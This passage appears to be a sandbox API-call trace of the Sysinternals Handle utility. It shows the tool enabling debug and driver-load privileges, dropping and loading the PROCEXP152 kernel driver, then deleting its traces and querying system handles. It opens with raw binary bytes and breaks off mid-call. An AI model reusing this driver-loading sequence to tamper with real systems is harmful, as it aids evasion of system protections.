\x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0097.768] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x100) returned 0x2b12c0 [0097.768] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x140010890) returned 0x0 [0097.768] RtlSizeHeap (HeapHandle=0x290000, Flags=0x0, MemoryPointer=0x2b12c0) returned 0x100 [0097.769] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77940000 [0097.769] GetProcAddress (hModule=0x77940000, lpProcName="IsWow64Process") returned 0x779491d0 [0097.769] GetCurrentProcess () returned 0xffffffffffffffff [0097.769] IsWow64Process (in: hProcess=0xffffffffffffffff, Wow64Process=0x12fef0 | out: Wow64Process=0x12fef0) returned 1 [0097.769] GetLastError () returned 0x0 [0097.769] SetLastError (dwErrCode=0x0) [0097.769] GetLastError () returned 0x0 [0097.769] SetLastError (dwErrCode=0x0) [0097.769] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x12fc10 | out: phkResult=0x12fc10*=0x0) returned 0x2 [0097.770] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x12fc10 | out: phkResult=0x12fc10*=0x0) returned 0x2 [0097.770] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", ulOptions=0x0, samDesired=0x101, phkResult=0x12fc10 | out: phkResult=0x12fc10*=0x0) returned 0x2 [0097.770] GetLastError () returned 0x0 [0097.770] SetLastError (dwErrCode=0x0) [0097.770] GetLastError () returned 0x0 [0097.770] SetLastError (dwErrCode=0x0) [0097.770] RegCreateKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", phkResult=0x12fc38 | out: phkResult=0x12fc38*=0x7c) returned 0x0 [0097.772] RegSetValueExW (in: hKey=0x7c, lpValueName="EulaAccepted", Reserved=0x0, dwType=0x4, lpData=0x12fc30*=0x1, cbData=0x4 | out: lpData=0x12fc30*=0x1) returned 0x0 [0097.772] RegCloseKey (hKey=0x7c) returned 0x0 [0097.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x0) returned 1 [0097.772] GetCurrentProcess () returned 0xffffffffffffffff [0097.772] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x12e3e0 | out: TokenHandle=0x12e3e0*=0x7c) returned 1 [0097.772] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12e3e8 | out: lpLuid=0x12e3e8*(LowPart=0x14, HighPart=0)) returned 1 [0098.435] AdjustTokenPrivileges (in: TokenHandle=0x7c, DisableAllPrivileges=0, NewState=0x12e3f0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0098.435] GetLastError () returned 0x0 [0098.435] CloseHandle (hObject=0x7c) returned 1 [0098.435] GetLastError () returned 0x0 [0098.435] SetLastError (dwErrCode=0x0) [0098.435] GetLastError () returned 0x0 [0098.435] SetLastError (dwErrCode=0x0) [0098.441] CreateFileW (lpFileName="\\\\.\\PROCEXP152" (normalized: "procexp152"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0098.441] GetLastError () returned 0x2 [0098.441] SetLastError (dwErrCode=0x2) [0098.441] GetLastError () returned 0x2 [0098.441] SetLastError (dwErrCode=0x2) [0098.446] CreateFileW (lpFileName="\\\\.\\Global\\PROCEXP152" (normalized: "procexp152"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0098.446] GetSystemDirectoryW (in: lpBuffer=0x12eaa0, uSize=0x208 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0098.446] GetLastError () returned 0x2 [0098.446] SetLastError (dwErrCode=0x2) [0098.446] GetLastError () returned 0x2 [0098.446] SetLastError (dwErrCode=0x2) [0098.446] FindResourceW (hModule=0x0, lpName=0x67, lpType="BINRES") returned 0x14003d0b8 [0098.446] LoadResource (hModule=0x0, hResInfo=0x14003d0b8) returned 0x14003d420 [0098.446] SizeofResource (hModule=0x0, hResInfo=0x14003d0b8) returned 0x8618 [0098.446] LockResource (hResData=0x14003d420) returned 0x14003d420 [0098.446] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x28) returned 0x2b3630 [0098.447] CreateFileW (lpFileName="C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" (normalized: "c:\\windows\\system32\\drivers\\procexp152.sys"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x12e210, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0098.448] GetFileType (hFile=0x7c) returned 0x1 [0098.448] WriteFile (in: hFile=0x7c, lpBuffer=0x14003d420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x12c7f0, lpOverlapped=0x0 | out: lpBuffer=0x14003d420*, lpNumberOfBytesWritten=0x12c7f0*=0x8000, lpOverlapped=0x0) returned 1 [0098.450] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x1000) returned 0x2b8b10 [0098.450] WriteFile (in: hFile=0x7c, lpBuffer=0x2b8b10*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x12c7e0, lpOverlapped=0x0 | out: lpBuffer=0x2b8b10*, lpNumberOfBytesWritten=0x12c7e0*=0x618, lpOverlapped=0x0) returned 1 [0098.450] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b8b10 | out: hHeap=0x290000) returned 1 [0098.450] CloseHandle (hObject=0x7c) returned 1 [0098.450] GetCurrentProcess () returned 0xffffffffffffffff [0098.450] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x12d900 | out: TokenHandle=0x12d900*=0x7c) returned 1 [0098.450] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeLoadDriverPrivilege", lpLuid=0x12d908 | out: lpLuid=0x12d908*(LowPart=0xa, HighPart=0)) returned 1 [0098.451] AdjustTokenPrivileges (in: TokenHandle=0x7c, DisableAllPrivileges=0, NewState=0x12d910*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0098.451] GetLastError () returned 0x0 [0098.451] CloseHandle (hObject=0x7c) returned 1 [0098.451] GetLastError () returned 0x0 [0098.451] SetLastError (dwErrCode=0x0) [0098.451] GetLastError () returned 0x0 [0098.451] SetLastError (dwErrCode=0x0) [0098.452] RegCreateKeyW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Services\\PROCEXP152", phkResult=0x12d988 | out: phkResult=0x12d988*=0x7c) returned 0x0 [0098.453] RegSetValueExW (in: hKey=0x7c, lpValueName="Type", Reserved=0x0, dwType=0x4, lpData=0x12d980*=0x1, cbData=0x4 | out: lpData=0x12d980*=0x1) returned 0x0 [0098.454] RegSetValueExW (in: hKey=0x7c, lpValueName="ErrorControl", Reserved=0x0, dwType=0x4, lpData=0x12d980*=0x1, cbData=0x4 | out: lpData=0x12d980*=0x1) returned 0x0 [0098.454] RegSetValueExW (in: hKey=0x7c, lpValueName="Start", Reserved=0x0, dwType=0x4, lpData=0x12d980*=0x3, cbData=0x4 | out: lpData=0x12d980*=0x3) returned 0x0 [0098.454] GetLastError () returned 0x0 [0098.454] SetLastError (dwErrCode=0x0) [0098.454] GetLastError () returned 0x0 [0098.454] SetLastError (dwErrCode=0x0) [0098.454] RegSetValueExW (in: hKey=0x7c, lpValueName="ImagePath", Reserved=0x0, dwType=0x1, lpData="\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS", cbData=0x5c | out: lpData="\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS") returned 0x0 [0098.455] RegCloseKey (hKey=0x7c) returned 0x0 [0098.455] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0098.455] GetProcAddress (hModule=0x77a60000, lpProcName="NtLoadDriver") returned 0x77ab2100 [0098.455] GetLastError () returned 0x0 [0098.455] SetLastError (dwErrCode=0x0) [0098.455] GetLastError () returned 0x0 [0098.455] SetLastError (dwErrCode=0x0) [0098.456] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0098.456] GetProcAddress (hModule=0x77a60000, lpProcName="RtlInitUnicodeString") returned 0x77ab5280 [0098.456] RtlInitUnicodeString (in: DestinationString=0x12d990, SourceString="\\Registry\\Machine\\System\\CurrentControlSet\\Services\\PROCEXP152" | out: DestinationString="\\Registry\\Machine\\System\\CurrentControlSet\\Services\\PROCEXP152") [0098.456] NtLoadDriver (DriverServiceName="\\Registry\\Machine\\System\\CurrentControlSet\\Services\\PROCEXP152") returned 0x0 [0101.411] GetLastError () returned 0x0 [0101.412] SetLastError (dwErrCode=0x0) [0101.417] GetLastError () returned 0x0 [0101.418] SetLastError (dwErrCode=0x0) [0101.424] RegDeleteKeyW (hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Services\\PROCEXP152\\Enum") returned 0x0 [0101.432] GetLastError () returned 0x0 [0101.443] SetLastError (dwErrCode=0x0) [0101.443] GetLastError () returned 0x0 [0101.444] SetLastError (dwErrCode=0x0) [0101.444] RegDeleteKeyW (hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Services\\PROCEXP152\\Security") returned 0x2 [0101.444] RegDeleteKeyW (hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Services\\PROCEXP152") returned 0x0 [0101.444] GetLastError () returned 0x0 [0101.445] SetLastError (dwErrCode=0x0) [0101.445] GetLastError () returned 0x0 [0101.445] SetLastError (dwErrCode=0x0) [0101.451] CreateFileW (lpFileName="\\\\.\\PROCEXP152" (normalized: "procexp152"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0101.451] SeCaptureSubjectContext (in: SubjectContext=0xfffff88005163598 | out: SubjectContext=0xfffff88005163598) [0101.451] ExGetPreviousMode () returned 0xfffffa8003825b01 [0101.451] SePrivilegeCheck (in: RequiredPrivileges=0xfffff880051635b8, SubjectSecurityContext=0xfffff88005163598, AccessMode=0x1 | out: RequiredPrivileges=0xfffff880051635b8) returned 1 [0101.451] SeReleaseSubjectContext (in: SubjectContext=0xfffff88005163598 | out: SubjectContext=0xfffff88005163598) [0101.451] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0101.451] DeleteFileW (lpFileName="C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" (normalized: "c:\\windows\\system32\\drivers\\procexp152.sys")) returned 1 [0101.452] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0101.452] GetProcAddress (hModule=0x77a60000, lpProcName="NtQueryInformationProcess") returned 0x77ab14a0 [0101.453] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0101.453] GetProcAddress (hModule=0x77a60000, lpProcName="NtQueryInformationThread") returned 0x77ab1560 [0101.453] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0101.453] GetProcAddress (hModule=0x77a60000, lpProcName="NtQuerySystemInformation") returned 0x77ab1670 [0101.453] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0101.453] GetProcAddress (hModule=0x77a60000, lpProcName="NtQuerySymbolicLinkObject") returned 0x77ab25d0 [0101.454] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0101.454] GetProcAddress (hModule=0x77a60000, lpProcName="NtQueryDirectoryObject") returned 0x77ab2440 [0101.454] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0101.454] GetProcAddress (hModule=0x77a60000, lpProcName="NtOpenSymbolicLinkObject") returned 0x77ab2310 [0101.454] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0101.454] GetProcAddress (hModule=0x77a60000, lpProcName="NtOpenDirectoryObject") returned 0x77ab1890 [0101.455] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0101.455] GetProcAddress (hModule=0x77a60000, lpProcName="NtQueryObject") returned 0x77ab1410 [0101.455] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0101.455] GetProcAddress (hModule=0x77a60000, lpProcName="NtQuerySection") returned 0x77ab1820 [0101.455] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0101.456] GetProcAddress (hModule=0x77a60000, lpProcName="RtlInitAnsiString") returned 0x77ab7f80 [0101.456] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0101.456] GetProcAddress (hModule=0x77a60000, lpProcName="RtlInitUnicodeString") returned 0x77ab5280 [0101.456] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0101.456] GetProcAddress (hModule=0x77a60000, lpProcName="RtlAnsiStringToUnicodeString") returned 0x77ab4e50 [0101.456] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0101.457] GetProcAddress (hModule=0x77a60000, lpProcName="RtlFreeUnicodeString") returned 0x77ab5610 [0101.457] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0101.457] GetProcAddress (hModule=0x77a60000, lpProcName="RtlFreeAnsiString") returned 0x77ab5610 [0101.457] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0101.457] GetProcAddress (hModule=0x77a60000, lpProcName="RtlUnicodeStringToAnsiString") returned 0x77ab5c50 [0101.457] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x0, Length=0x0, ResultLength=0x0 | out: SystemInformation=0x0, ResultLength=0x0) returned 0xc0000004 [0101.457] GetLastError () returned 0x0 [0101.458] SetLastError (dwErrCode=0x0) [0101.458] GetLastError () returned 0x0 [0101.458] SetLastError (dwErrCode=0x0) [0101.458] GetDriveTypeW (lpRootPathName="A:\\") returned 0x1 [0101.458] GetLastError () returned 0x0 [0101.458] SetLastError (dwErrCode=0x0) [0101.458] GetLastError () returned 0x0 [0101.458] SetLastError (dwErrCode=0x0) [0101.458] GetDriveTypeW (lpRootPathName="B:\\") returned 0x1 [0101.459] GetLastError () returned 0x0 [0101.459] SetLastError (dwErrCode=0x0) [0101.459] GetLastError () returned 0x0 [0101.459] SetLastError (dwErrCode=0x0) [0101.459] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0101.459] GetLastError () returned 0x0 [0101.459] SetLastError (dwErrCode=0x0) [0101.459] GetLastError () returned 0x0 [0101.460] SetLastError (dwErrCode=0x0) [0101.460] RtlInitUnicodeString (in: DestinationString=0x12dac0, SourceString="\\DosDevices\\C:" | out: DestinationString="\\DosDevices\\C:") [0101.460] NtOpenSymbolicLinkObject (in: SymbolicLinkHandle=0x12db00, DesiredAccess=0x20001, ObjectAttributes=0x12db10 | out: SymbolicLinkHandle=0x12db00*=0xc0) returned 0x0 [0101.460] NtQuerySymbolicLinkObject (in: SymLinkObjHandle=0xc0, LinkTarget=0x12dbe0, DataWritten=0x12db08 | out: LinkTarget="\\Device\\HarddiskVolume1", DataWritten=0x12db08) returned 0x0 [0101.460] CloseHandle (hObject=0xc0) returned 1 [0101.460] RtlInitUnicodeString (in: DestinationString=0x12dac0, SourceString="\\Device\\HarddiskVolume1" | out: DestinationString="\\Device\\HarddiskVolume1") [0101.460] NtOpenSymbolicLinkObject (in: SymbolicLinkHandle=0x12db00, DesiredAccess=0x20001, ObjectAttributes=0x12db10 | out: SymbolicLinkHandle=0x12db00*=0x0) returned 0xc0000024 [0101.461] GetLastError () returned 0x0 [0101.461] SetLastError (dwErrCode=0x0) [0101.461] GetLastError () returned 0x0 [0101.461] SetLastError (dwErrCode=0x0) [0101.461] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0101.461] GetLastError () returned 0x0 [0101.461] SetLastError (dwErrCode=0x0) [0101.462] GetLastError () returned 0x0 [0101.462] SetLastError (dwErrCode=0x0) [0101.462] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0101.462] GetLastError () returned 0x0 [0101.462] SetLastError (dwErrCode=0x0) [0101.462] GetLastError () returned 0x0 [0101.462] SetLastError (dwErrCode=0x0) [0101.462] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0101.463] GetLastError () returned 0x0 [0101.463] SetLastError (dwErrCode=0x0) [0101.463] GetLastError () returned 0x0 [0101.463] SetLastError (dwErrCode=0x0) [0101.463] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0101.463] GetLastError () returned 0x0 [0101.464] SetLastError (dwErrCode=0x0) [0101.464] GetLastError () returned 0x0 [0101.464] SetLastError (dwErrCode=0x0) [0101.464] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0101.464] GetLastError () returned 0x0 [0101.464] SetLastError (dwErrCode=0x0) [0101.464] GetLastError () returned 0x0 [0101.464] SetLastError (dwErrCode=0x0) [0101.464] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0101.465] GetLastError () returned 0x0 [0101.465] SetLastError (dwErrCode=0x0) [0101.465] GetLastError () returned 0x0 [0101.465] SetLastError (dwErrCode=0x0) [0101.465] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0101.465] GetLastError () returned 0x0 [0101.466] SetLastError (dwErrCode=0x0) [0101.466] GetLastError () returned 0x0 [0101.466] SetLastError (dwErrCode=0x0) [0101.466] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0101.466] GetLastError () returned 0x0 [0101.466] SetLastError (dwErrCode=0x0) [0101.467] GetLastError () returned 0x0 [0101.467] SetLastError (dwErrCode=0x0) [0101.467] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0101.467] GetLastError () returned 0x0 [0101.467] SetLastError (dwErrCode=0x0) [0101.467] GetLastError () returned 0x0 [0101.467] SetLastError (dwErrCode=0x0) [0101.467] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0101.468] GetLastError () returned 0x0 [0101.468] SetLastError (dwErrCode=0x0) [0101.468] GetLastError () returned 0x0 [0101.468] SetLastError (dwErrCode=0x0) [0101.468] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0101.468] GetLastError () returned 0x0 [0101.469] SetLastError (dwErrCode=0x0) [0101.469] GetLastError () returned 0x0 [0101.469] SetLastError (dwErrCode=0x0) [0101.469] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0101.469] GetLastError () returned 0x0 [0101.469] SetLastError (dwErrCode=0x0) [0101.469] GetLastError () returned 0x0 [0101.469] SetLastError (dwErrCode=0x0) [0101.469] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0101.470] GetLastError () returned 0x0 [0101.470] SetLastError (dwErrCode=0x0) [0101.470] GetLastError () returned 0x0 [0101.470] SetLastError (dwErrCode=0x0) [0101.470] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0101.470] GetLastError () returned 0x0 [0101.470] SetLastError (dwErrCode=0x0) [0101.470] GetLastError () returned 0x0 [0101.471] SetLastError (dwErrCode=0x0) [0101.471] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0101.471] GetLastError () returned 0x0 [0101.471] SetLastError (dwErrCode=0x0) [0101.471] GetLastError () returned 0x0 [0101.472] SetLastError (dwErrCode=0x0) [0101.472] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0101.472] GetLastError () returned 0x0 [0101.472] SetLastError (dwErrCode=0x0) [0101.472] GetLastError () returned 0x0 [0101.472] SetLastError (dwErrCode=0x0) [0101.472] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0101.473] GetLastError () returned 0x0 [0101.473] SetLastError (dwErrCode=0x0) [0101.473] GetLastError () returned 0x0 [0101.473] SetLastError (dwErrCode=0x0) [0101.473] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0101.473] GetLastError () returned 0x0 [0101.474] SetLastError (dwErrCode=0x0) [0101.474] GetLastError () returned 0x0 [0101.474] SetLastError (dwErrCode=0x0) [0101.474] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0101.474] GetLastError () returned 0x0 [0101.474] SetLastError (dwErrCode=0x0) [0101.474] GetLastError () returned 0x0 [0101.475] SetLastError (dwErrCode=0x0) [0101.475] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0101.475] GetLastError () returned 0x0 [0101.475] SetLastError (dwErrCode=0x0) [0101.475] GetLastError () returned 0x0 [0101.475] SetLastError (dwErrCode=0x0) [0101.475] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0101.476] GetLastError () returned 0x0 [0112.475] SetLastError (dwErrCode=0x0) [0112.475] GetLastError () returned 0x0 [0112.475] SetLastError (dwErrCode=0x0) [0112.476] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0112.477] GetLastError () returned 0x0 [0112.477] SetLastError (dwErrCode=0x0) [0112.477] GetLastError () returned 0x0 [0112.477] SetLastError (dwErrCode=0x0) [0112.477] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0112.477] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x4000) returned 0x2b8b10 [0112.478] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x2b8b10, Length=0x4000, ResultLength=0x12e420 | out: SystemInformation=0x2b8b10, ResultLength=0x12e420*=0x678c8) returned 0xc0000004 [0112.495] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b8b10 | out: hHeap=0x290000) returned 1 [0112.495] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x8000) returned 0x2b8b10 [0112.495] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x2b8b10, Length=0x8000, ResultLength=0x12e420 | out: SystemInformation=0x2b8b10, ResultLength=0x12e420*=0x678c8) returned 0xc0000004 [0112.500] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b8b10 | out: hHeap=0x290000) returned 1 [0112.501] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x10000) returned 0x2b8b10 [0112.501] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x2b8b10, Length=0x10000, ResultLength=0x12e420 | out: SystemInformation=0x2b8b10, ResultLength=0x12e420*=0x678c8) returned 0xc0000004 [0112.511] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b8b10 | out: hHeap=0x290000) returned 1 [0112.511] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x20000) returned 0x2b8b10 [0112.511] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x2b8b10, Length=0x20000, ResultLength=0x12e420 | out: SystemInformation=0x2b8b10, ResultLength=0x12e420*=0x67f80) returned 0xc0000004 [0113.713] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b8b10 | out: hHeap=0x290000) returned 1 [0113.713] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x40000) returned 0x2b8b10 [0113.713] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x2b8b10, Length=0x40000, ResultLength=0x12e420 | out: SystemInformation=0x2b8b10, ResultLength=0x12e420*=0x68020) returned 0xc0000004 [0113.728] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b8b10 | out: hHeap=0x290000) returned 1 [0113.728] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x80000) returned 0x1e10080 [0113.729] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x1e10080, Length=0x80000, ResultLength=0x12e420 | out: SystemInformation=0x1e10080, ResultLength=0x12e420*=0x68200) returned 0x0 [0114.565] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x4000) returned 0x2b8b10 [0114.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2b8b10, Length=0x4000, ResultLength=0x12e420 | out: SystemInformation=0x2b8b10, ResultLength=0x12e420*=0x13620) returned 0xc0000004 [0114.566] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b8b10 | out: hHeap=0x290000) returned 1 [0114.566] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x8000) returned 0x2b8b10 [0114.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2b8b10, Length=0x8000, ResultLength=0x12e420 | out: SystemInformation=0x2b8b10, ResultLength=0x12e420*=0x13620) returned 0xc0000004 [0114.567] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b8b10 | out: hHeap=0x290000) returned 1 [0114.567] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0xc000) returned 0x2b8b10 [0114.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2b8b10, Length=0xc000, ResultLength=0x12e420 | out: SystemInformation=0x2b8b10, ResultLength=0x12e420*=0x13620) returned 0xc0000004 [0114.567] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b8b10 | out: hHeap=0x290000) returned 1 [0114.567] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x10000) returned 0x2b8b10 [0114.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2b8b10, Length=0x10000, ResultLength=0x12e420 | out: SystemInformation=0x2b8b10, ResultLength=0x12e420*=0x13620) returned 0xc0000004 [0114.567] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b8b10 | out: hHeap=0x290000) returned 1 [0114.567] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x14000) returned 0x2b8b10 [0114.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2b8b10, Length=0x14000, ResultLength=0x12e420 | out: SystemInformation=0x2b8b10, ResultLength=0x12e420*=0x13620) returned 0x0 [0114.568] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x67c) returned 0xc0 [0114.568] GetCurrentProcess () returned 0xffffffffffffffff [0114.568] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x28, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0114.568] CloseHandle (hObject=0xc0) returned 1 [0114.568] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0114.568] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x70) returned 0x2b4c50 [0114.569] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x2b4c50, ObjectInformationLength=0x70, ReturnLength=0x0 | out: ObjectInformation=0x2b4c50, ReturnLength=0x0) returned 0x0 [0114.569] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4c50 | out: hHeap=0x290000) returned 1 [0114.569] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e90090 [0114.569] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e90090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e90090*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0114.569] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0114.569] PsAcquireProcessExitSynchronization () returned 0x0 [0114.569] KeStackAttachProcess (in: PROCESS=0xfffffa80025564f0, 